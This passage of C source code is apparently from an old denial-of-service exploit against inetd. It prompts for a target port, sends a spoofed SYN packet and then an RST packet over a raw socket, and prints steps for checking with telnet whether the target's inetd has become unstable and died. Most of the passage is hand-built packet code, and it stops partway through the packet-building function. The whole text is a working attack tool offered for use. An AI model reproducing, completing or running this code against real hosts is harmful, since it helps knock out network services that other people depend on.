printf("\nEnter target port (should be 13, 37, or some internal service)-> ");
fgets(buf,sizeof(buf)-1,stdin);
if(!buf[1])exit(0);
port=(unsigned short)atoi(buf);
fprintf(stderr,"Attempting to upset inetd...\n\n");
s3nd(sock,0,target,port,source); /* SYN */
s3nd(sock,1,target,port,source); /* RST */
fprintf(stderr,"At this point, if the host is vulnerable, inetd is unstable.\nTo verfiy: `telnet target.com {internal service port #}`. Do this twice.\nInetd should allow the first connection, but send no data, then die.\nThe second telnet will verify t
his.\n");
}
/*
* Build a packet and send it off.
*/
void s3nd(int sock,int mode,unsigned target,unsigned short port,unsigned source){
struct pkt{
struct iphdr ip;
struct tcphdr tcp;
}packet;
struct pseudo_header{ /* For TCP header checksum */
unsigned source_address;
unsigned dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
}pseudo_header;
struct sockaddr_in sin; /* IP address information */
/* Setup the sin struct with addressing information */
sin.sin_family=AF_INET; /* Internet address family */
sin.sin_port=666; /* Source port */
sin.sin_addr.s_addr=target; /* Dest. address */
/* Packet assembly begins here */
/* Fill in all the TCP header information */
packet.tcp.source=htons(666); /* 16-bit Source port number */
packet.tcp.dest=htons(port); /* 16-bit Destination port */
if(mode)packet.tcp.seq=0; /* 32-bit Sequence Number */
else packet.tcp.seq=htonl(10241024);
if(!mode)packet.tcp.ack_seq=0; /* 32-bit Acknowledgement Number */
else packet.tcp.ack_seq=htonl(102410000);
packet.tcp.doff=5; /* Data offset */
packet.tcp.res1=0; /* reserved */
packet.tcp.res2=0; /* reserved */
packet.tcp.urg=0; /* Urgent offset valid flag */
packet.tcp.ack=0; /* Acknowledgement field valid flag */
packet.tcp.psh=0; /* Push flag */
if(!mode)packet.tcp.rst=0; /* Reset flag */
else packet.tcp.rst=1;
if(!mode)packet.tcp.syn=1; /* Synchronize sequence numbers flag */